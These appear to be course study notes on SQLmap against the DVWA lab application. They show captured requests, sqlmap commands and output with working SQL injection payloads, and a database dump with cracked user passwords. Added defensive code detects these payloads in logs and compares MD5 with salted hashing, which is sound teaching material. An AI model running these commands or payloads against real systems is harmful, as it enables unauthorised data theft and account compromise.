0xnhl

SQLmap

Created: 1/12/2026 Updated: 1/12/2026
#cybersec/tools #cybersec #ciscoeh

SQLmap is often considered a web vulnerability and SQL injection tool. It helps automate the enumeration of vulnerable applications, as well as the exploitation of SQL injection.


Let’s take a look at a quick example of how to use SQLmap to exploit an SQL injection vulnerability. Say that a host with IP address 10.1.1.14 is vulnerable to SQL injection. To automate the enumeration and exploitation of this vulnerability, you first connect to the vulnerable application and capture the HTTP GET request by using a proxy. (Module 6 describes how proxies work.) Example 10-15 shows the captured HTTP GET request to the vulnerable server (10.1.1.14).

Example 10-15 - HTTP GET Request to a Vulnerable Web Application

```plaintext
GET /dvwa/vulnerabilities/sqli/?id=omar&Submit=Submit HTTP/1.1
Host: 10.1.1.14
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.1.1.14/dvwa/vulnerabilities/sqli/
Cookie: security=low; PHPSESSID=1558e11b491da91be3b68e5cce953ca4
Connection: close
Upgrade-Insecure-Requests: 1
```

The first highlighted line in Example 10-15 shows the GET request’s URI. The second highlighted line shows the cookie and the session ID (PHPSESSID=1558e11b491da91be3b68e5cce953ca4). You can use this information to launch the SQLmap tool, as shown in Example 10-16.

Example 10-16 - Using the SQLmap Tool to Exploit an SQL Injection Vulnerability

```plaintext
root@kali:~# sqlmap -u "http://10.1.1.14/dvwa/vulnerabilities/sqli/?id=omar&Submit=Submit" --cookie="security=low; PHPSESSID=1558e11b491da91be3b68e5cce953ca4" --dbs
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.2.4#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:49:11

[21:49:11] [INFO] testing connection to the target URL
[21:49:11] [INFO] testing if the target URL content is stable
[21:49:12] [INFO] target URL content is stable
[21:49:12] [INFO] testing if GET parameter 'id' is dynamic
...<output omitted for brevity>...
[21:50:12] [INFO] target URL appears to have 2 columns in query
[21:50:12] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[21:50:12] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 201 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
    Payload: id=omar' OR NOT 3391=3391#&Submit=Submit

    Type: error-based
    Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: id=omar' OR ROW(5759,9381)>(SELECT COUNT(*),CONCAT(0x7162717871,(SELECT (ELT(5759=5759,1))),0x716a717671,FLOOR(RAND(0)*2))x FROM (SELECT 5610 UNION SELECT 4270 UNION SELECT 5009 UNION SELECT 5751)a GROUP BY x)-- AxAS&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: id=omar' OR SLEEP(5)-- dxIW&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=omar' UNION ALL SELECT CONCAT(0x7162717871,0x6a4752487050494664786251457769674b666b4f74566843756e766764785546795679694159677a, 0x716a717671), NULL#&Submit=Submit
---
[21:50:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 4.1
[21:50:22] [INFO] fetching database names
available databases [7]:
[*] dvwa
[*] information_schema
[*] metasploit
[*] mysql
[*] owasp10
[*] tikiwiki
[*] tikiwiki195

[21:50:22] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.14'

[*] shutting down at 21:50:22
```

The first four highlighted lines in Example 10-16 show how SQLmap automates the various tests and payloads sent to the vulnerable application. (You might recognize some of these SQL statements and queries from Module 6.) The last few highlighted lines show how SQLmap was able to enumerate all the databases in the SQL server.
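From the defender's side, the four techniques reported in Example 10-16 leave recognizable traces in the web server's access log. The following is an added example, not part of the original notes or of SQLmap: it percent-decodes query parameters from Apache combined-format log lines and labels them with the technique names from the sqlmap output. The client address 192.0.2.10, the log lines, and the regular expressions are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, quote, urlsplit

# One signature per technique name sqlmap printed in Example 10-16 (assumed patterns).
SIGNATURES = {
    "boolean-based blind": re.compile(r"'\s*(?:OR|AND)\s+(?:NOT\s+)?(\d+)\s*=\s*\1\b", re.I),
    "error-based": re.compile(r"\bFLOOR\s*\(\s*RAND\s*\(", re.I),
    "time-based blind": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    "UNION query": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
}
# Apache "combined" format up to the request line: client, identities, timestamp, request.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*"')

def classify(value):
    """Return the set of technique names whose signature matches a decoded value."""
    return {name for name, rx in SIGNATURES.items() if rx.search(value)}

def scan(lines):
    """Return (line_no, client_ip, parameter, techniques) for each suspicious parameter."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        # parse_qsl percent-decodes, so signatures see what the application received.
        for param, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
            techniques = classify(value)
            if techniques:
                findings.append((line_no, m["ip"], param, techniques))
    return findings

def log_line(id_value):
    """Build one constructed access-log line carrying id_value in the 'id' parameter."""
    target = "/dvwa/vulnerabilities/sqli/?id=" + quote(id_value, safe="") + "&Submit=Submit"
    return f'192.0.2.10 - - [12/Jan/2026:21:50:12 +0000] "GET {target} HTTP/1.1" 200 4512 "-" "-"'

# Constructed sample log: one benign request, then payloads taken from Example 10-16
# (the UNION and error-based ones are shortened).
SAMPLE_LOG = [
    log_line("omar"),
    log_line("omar' OR NOT 3391=3391#"),
    log_line("omar' OR SLEEP(5)-- dxIW"),
    log_line("omar' UNION ALL SELECT NULL,NULL#"),
    log_line("omar' OR ROW(5759,9381)>(SELECT COUNT(*),CONCAT(0x7162717871,"
             "FLOOR(RAND(0)*2))x FROM (SELECT 5610 UNION SELECT 4270)a GROUP BY x)-- AxAS"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Signature hits like these are triage input for the default payloads only; the durable fix is a parameterized query for the `id` parameter.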

When you have a list of all available databases, you can try to retrieve the tables and records of the dvwa database by using the command shown in Example 10-17.

Example 10-17 - Retrieving Sensitive Information from a Database

```plaintext
root@kali:~# sqlmap -u "http://10.1.1.14/dvwa/vulnerabilities/sqli/?id=omar&Submit=Submit" --cookie="security=low; PHPSESSID=1558e11b491da91be3b68e5cce953ca4" -D dvwa --dump-all
        ___
...<output omitted for brevity>...
[22:14:51] [INFO] resuming back-end DBMS 'mysql'
[22:14:51] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
    Payload: id=omar' OR NOT 3391=3391#&Submit=Submit

    Type: error-based
    Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: id=omar' OR ROW(5759,9381)>(SELECT COUNT(*),CONCAT(0x7162717871,(SELECT (ELT(5759=5759,1))),0x716a717671,FLOOR(RAND(0)*2))x FROM (SELECT 5610 UNION SELECT 4270 UNION SELECT 5009 UNION SELECT 5751)a GROUP BY x)-- AxAS&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: id=omar' OR SLEEP(5)-- dxIW&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=omar' UNION ALL SELECT CONCAT(0x7162717871,0x6a4752487050494664786251457769674b666b4f74566843756e766764785546795679694159677a,0x716a717671),NULL#&Submit=Submit
---
[22:14:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 4.1
[22:14:52] [INFO] fetching tables for database: 'dvwa'
[22:14:52] [WARNING] reflective value(s) found and filtering out
[22:14:52] [INFO] fetching columns for table 'users' in database 'dvwa'
[22:14:52] [INFO] fetching entries for table 'users' in database 'dvwa'
[22:14:52] [INFO] recognized possible password hashes in column 'password'
...<output omitted for brevity>...
[22:15:06] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[22:15:06] [INFO] starting 2 processes
[22:15:08] [INFO] cracked password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
[22:15:08] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
[22:15:11] [INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
[22:15:13] [INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'
Database: dvwa
Table: users
[5 entries]
+---------+---------+-------------------------------------------------------+---------------------------------------------+-----------+------------+
| user_id | user    | avatar                                                | password                                    | last_name | first_name |
+---------+---------+-------------------------------------------------------+---------------------------------------------+-----------+------------+
| 1       | admin   | http://172.16.123.129/dvwa/hackable/users/admin.jpg   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      |
| 2       | gordonb | http://172.16.123.129/dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     |
| 3       | 1337    | http://172.16.123.129/dvwa/hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       |
| 4       | pablo   | http://172.16.123.129/dvwa/hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      |
| 5       | smithy  | http://172.16.123.129/dvwa/hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        |
+---------+---------+-------------------------------------------------------+---------------------------------------------+-----------+------------+

[22:15:17] [INFO] table 'dvwa.users' dumped to CSV file '/root/.sqlmap/output/10.1.1.14/dump/dvwa/users.csv'
[22:15:17] [INFO] fetching columns for table 'guestbook' in database 'dvwa'
[22:15:17] [INFO] fetching entries for table 'guestbook' in database 'dvwa'
Database: dvwa
Table: guestbook
[1 entry]
+------------+------+-------------------------+
| comment_id | name | comment                 |
+------------+------+-------------------------+
| 1          | test | This is a test comment. |
+------------+------+-------------------------+

[22:15:17] [INFO] table 'dvwa.guestbook' dumped to CSV file '/root/.sqlmap/output/10.1.1.14/dump/dvwa/guestbook.csv'
[22:15:17] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.14'

[*] shutting down at 22:15:17
```

The first four highlighted lines in Example 10-17 show how SQLmap was able to automatically enumerate users from the compromised database and crack their passwords.
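The dictionary attack in Example 10-17 finished in seconds because the `password` column holds plain, unsalted MD5 digests. The following is an added example, not part of the original notes or of DVWA: it confirms that property from the hash and password pairs shown in the dump, shows how identical hashes expose password reuse, and contrasts this with salted PBKDF2 storage. The function names and the iteration count are assumptions chosen for illustration.

```python
import hashlib
import hmac
import os
from collections import defaultdict

# user -> (stored hash, cracked password), copied from the dvwa.users dump in Example 10-17.
DUMP = {
    "admin": ("5f4dcc3b5aa765d61d8327deb882cf99", "password"),
    "gordonb": ("e99a18c428cb38d5f260853678922e03", "abc123"),
    "1337": ("8d3533d75ae2c3966d7e0d4fcc69216b", "charley"),
    "pablo": ("0d107d09f5bbe40cade3de5c71e9e9b7", "letmein"),
    "smithy": ("5f4dcc3b5aa765d61d8327deb882cf99", "password"),
}
ITERATIONS = 600_000  # assumed PBKDF2 work factor; tune to your own hardware

def is_unsalted_md5(stored_hash, password):
    """True when the stored value is just MD5(password): no salt, no stretching."""
    return hashlib.md5(password.encode()).hexdigest() == stored_hash

def shared_hashes(dump):
    """Group users by stored hash; a group larger than one reveals password reuse."""
    groups = defaultdict(list)
    for user, (stored_hash, _) in dump.items():
        groups[stored_hash].append(user)
    return sorted(sorted(users) for users in groups.values() if len(users) > 1)

def hash_password(password, salt=None):
    """Hardened storage: random per-user salt plus a deliberately slow KDF."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest

def verify_password(password, salt, digest):
    """Recompute with the stored salt and compare in constant time."""
    return hmac.compare_digest(hash_password(password, salt)[1], digest)

if __name__ == "__main__":
    print(all(is_unsalted_md5(h, p) for h, p in DUMP.values()))
    print(shared_hashes(DUMP))
    first, second = hash_password("password"), hash_password("password")
    print(first[1] != second[1], verify_password("password", *first))
```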